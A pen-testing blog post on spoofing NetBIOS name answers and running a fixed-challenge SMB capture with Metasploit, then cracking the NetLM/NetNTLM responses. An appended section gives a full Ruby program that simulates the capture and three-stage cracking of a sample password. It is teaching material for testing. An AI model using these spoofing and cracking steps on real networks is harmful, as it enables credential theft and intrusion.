The information in this post is not new and there are many other posts that cover similar material. However, after a number of conversations with other pen testers it is clear that this is not something that always gets used during testing. For that reason I decided it was something I wanted to cover, as it is cheap and cheerful and normally results in a win!
So, as if LM hashing wasn't bad enough, things get a great deal easier if we control the challenge in a NetLM exchange: the client encrypts a challenge we chose with keys derived from its LM hash, and if that challenge is fixed and known the response can be attacked with precomputed rainbow tables. Fortunately Metasploit has a module for this, auxiliary/server/capture/smb. The module accepts the SMB authentication request that comes to our server and sends a preset challenge instead of a random one (the CHALLENGE option, which defaults to 1122334455667788, the value the public halflmchall rainbow tables were generated for). Now all we need to do is get clients diverted to our listening module and we're good to go.
Again Metasploit provides a module to help us divert requests to our server, this time by spoofing NetBIOS Name Service answers: auxiliary/spoof/nbns/nbns_response. This module replies to NetBIOS name queries broadcast on the local subnet with an address we choose (the SPOOFIP option). This is perfect, because any request that would otherwise fail (a mistyped server or share name, or a stale mapped drive) is now sent to our SMB module, which negotiates a NetLM/NetNTLM response to our fixed challenge.
So let's set up the two jobs (both run in the background, with the SMB module's JOHNPWFILE and/or CAINPWFILE options set so that captured responses are written out in a crackable format):
Now we wait, either for legacy config calling old mapped drives or for admins/users calling shares and failing to type the name correctly.
Waiting……….. And boom a hit!
Now we have an LM and an NTLM challenge response (the "NetLM" and "NetNTLM" hashes) to break.
Fortunately this can all be done with free tools, including the halflmchall rainbow tables that can be downloaded from http://www.freerainbowtables.com.
The password can be recovered in three steps:
- Break the first 7 characters with rainbow tables (the first 8 bytes of the LM response depend only on these characters).
- Break the second 7 characters with a brute-force script, using the known first half.
- Test case variants of the known uppercase LM password against the NTLM response to get the actual, case-sensitive password.
Cracking the first part of the password
Using rcracki_mt and the rainbow tables it is possible to crack the first 7 characters of the password. The first 16 hex characters (8 bytes) of the LM response are the DES encryption of the challenge under the first 7 bytes of the LM hash, which in turn depend only on the first 7 characters of the password. Those 16 hex characters should be passed to rcracki_mt as below, along with the location of the rainbow tables:
We can see that the first 7 characters of the password are TRUSTNO.
Cracking the second part of the password
We will use Metasploit's halflm_second.rb script with the following flags:
- -n: the full LM response (the 48 hex characters captured by the SMB module)
- -p: the first 7 characters of the password recovered with rcracki_mt
- -s: the challenge that we preset in the SMB Metasploit module
The script uses the known first half to fix the eighth byte of the LM hash and then brute-forces the remaining characters, checking each candidate against the second 8 bytes of the response.
Awesome, so now we have the full password, TRUSTNO11, but it is all in uppercase, so we still could not log in on the console or use it elsewhere, such as for database access.
Returning case-sensitive to the password
Cain is our friend for this one. Although there are other methods, such as using john, we will use Cain's test password function. The SMB Metasploit module writes the collected hashes out in two formats, one ready for john (JOHNPWFILE) and one ready for Cain (CAINPWFILE). All we need to do is load the Cain file into Cain and then test the password with the known uppercase version gathered in the previous step; the case-sensitive candidates are checked against the NTLM response, which, unlike LM, preserves case.
As you can see under NT Password we have the actual password, Trustno11. We have now possibly found a way into a network where there were no other known vulnerabilities. Whoop whoop! WIN!
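To make the three steps concrete, here is an added worked example in Ruby (Metasploit's own language, which is also what halflm_second.rb is written in). It is my own code, not code from this post or from the Metasploit project. It simulates a capture of the password Trustno11 against the default challenge 1122334455667788 and then recovers the password in the same three stages: a constructed four-word list stands in for the halflmchall rainbow-table lookup on the first 8 bytes of the LM response, a brute force over A-Z and 0-9 reproduces what halflm_second.rb does for the second half using the known first 7 characters, and a case-permutation search against the NTLM response reproduces what Cain's test password function (or john) does. Single DES is obtained from 3DES with three identical keys, and a small MD4 is included, because OpenSSL 3 moves both plain DES and MD4 into its legacy provider; the password, the wordlist and the two-character brute-force limit are constructed sample inputs.

```ruby
require 'openssl'
# Constructed sample input: the capture/smb module's default CHALLENGE value and
# the password of the client whose SMB authentication we simulate capturing.
CHALLENGE = ['1122334455667788'].pack('H*')
ACTUAL_PASSWORD = 'Trustno11'
LM_MAGIC = 'KGS!@#$%'.b   # constant that each 7-byte LM half encrypts
UPPER_DIGITS = ('A'..'Z').to_a + ('0'..'9').to_a

# Expand a 7-byte key to an 8-byte DES key (parity bits zero; DES ignores them).
def des_key(k7)
  [k7.unpack1('B*').scan(/.{7}/).map { |b| b + '0' }.join].pack('B*')
end
# Single-DES ECB of one block via 3DES with K1 = K2 = K3 (identical to single DES).
def des(k7, block)
  c = OpenSSL::Cipher.new('des-ede3')
  c.encrypt
  c.padding = 0
  c.key = des_key(k7) * 3
  c.update(block) + c.final
end
# LM hash: uppercase, pad/truncate to 14 bytes, two independent 7-byte halves.
def lm_hash(password)
  p = password.upcase.b[0, 14].ljust(14, "\0")
  des(p[0, 7], LM_MAGIC) + des(p[7, 7], LM_MAGIC)
end
# Minimal MD4 (RFC 1320) for NTLM; MD4 is also legacy-only in OpenSSL 3.
def md4(msg)
  rotl = ->(x, n) { ((x << n) | (x >> (32 - n))) & 0xffffffff }
  a, b, c, d = 0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476
  m = msg.b + "\x80".b
  m << "\0" until m.bytesize % 64 == 56
  m << [msg.bytesize * 8].pack('Q<')
  rounds = [
    [->(u, v, w) { (u & v) | (~u & w) }, 0, (0..15).to_a, [3, 7, 11, 19]],
    [->(u, v, w) { (u & v) | (u & w) | (v & w) }, 0x5a827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], [3, 5, 9, 13]],
    [->(u, v, w) { u ^ v ^ w }, 0x6ed9eba1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], [3, 9, 11, 15]]
  ]
  m.unpack('V*').each_slice(16) do |x|
    aa, bb, cc, dd = a, b, c, d
    rounds.each do |fn, k, order, shifts|
      order.each_with_index do |i, j|
        a = rotl.((a + fn.(b, c, d) + x[i] + k) & 0xffffffff, shifts[j % 4])
        a, b, c, d = d, a, b, c
      end
    end
    a, b, c, d = [a + aa, b + bb, c + cc, d + dd].map { |v| v & 0xffffffff }
  end
  [a, b, c, d].pack('V4')
end
def ntlm_hash(password); md4(password.encode('UTF-16LE')); end

# LM / NTLMv1 response: the 16-byte hash is zero-padded to 21 bytes and split into
# three 7-byte DES keys, each of which encrypts the server challenge.
def challenge_response(hash16, challenge)
  k = hash16 + "\0" * 5
  (0..2).map { |i| des(k[i * 7, 7], challenge) }.join
end

# Step 1: response bytes 0-7 are DES_{lmhash[0..6]}(challenge) and depend only on
# the first 7 password characters, so with a fixed challenge a rainbow table can be
# precomputed. A constructed wordlist stands in for that table lookup here.
def crack_first_half(lm_resp, challenge, wordlist)
  wordlist.each { |w| return w.upcase if des(lm_hash(w)[0, 7], challenge) == lm_resp[0, 8] }
  nil
end
# Step 2 (what halflm_second.rb does): the known first half fixes lmhash[7];
# brute-force characters 8-14, form K2 = lmhash[7] + second_half[0..5] and compare
# DES_K2(challenge) with response bytes 8-15. Length 0 covers 7-character passwords.
def crack_second_half(lm_resp, challenge, first7, charset, max_len)
  lm_byte7 = lm_hash(first7)[7, 1]
  (0..max_len).each do |len|
    charset.repeated_permutation(len) do |chars|
      tail = chars.join
      half2 = des(tail.b.ljust(7, "\0"), LM_MAGIC)
      return first7 + tail if des(lm_byte7 + half2[0, 6], challenge) == lm_resp[8, 8]
    end
  end
  nil
end
# Step 3 (what Cain's test password function, or john, does): try every
# upper/lower-case variant of the LM password against the NTLM response.
def recover_case(ntlm_resp, challenge, upper_pw)
  chars = upper_pw.chars
  letters = chars.each_index.select { |i| chars[i] =~ /[A-Z]/ }
  (0...(1 << letters.size)).each do |mask|
    cand = chars.dup
    letters.each_with_index { |i, bit| cand[i] = cand[i].downcase if mask[bit] == 1 }
    cand = cand.join
    return cand if challenge_response(ntlm_hash(cand), challenge) == ntlm_resp
  end
  nil
end

# Simulated capture: the two responses the SMB module would log for this client.
LM_RESP = challenge_response(lm_hash(ACTUAL_PASSWORD), CHALLENGE)
NTLM_RESP = challenge_response(ntlm_hash(ACTUAL_PASSWORD), CHALLENGE)
def run_attack(lm_resp, ntlm_resp, challenge)
  first7 = crack_first_half(lm_resp, challenge, %w[PASSWOR ADMINIS TRUSTNO WELCOME])
  upper = first7 && crack_second_half(lm_resp, challenge, first7, UPPER_DIGITS, 2)
  upper && recover_case(ntlm_resp, challenge, upper)
end
puts "LM #{LM_RESP.unpack1('H*')} NTLM #{NTLM_RESP.unpack1('H*')} => #{run_attack(LM_RESP, NTLM_RESP, CHALLENGE)}"
```

Run it with ruby and it prints the two 48-hex-character responses followed by the recovered password. The property that makes step 1 cheap is visible in crack_first_half: only bytes 0-6 of the LM hash feed the first DES block of the response, so once the challenge is fixed that block is a pure function of the first seven uppercase characters, which is exactly what a halflmchall table indexes. Step 2 then needs no table at all because the search space for the tail is tiny, and step 3 is bounded by 2 to the power of the number of letters.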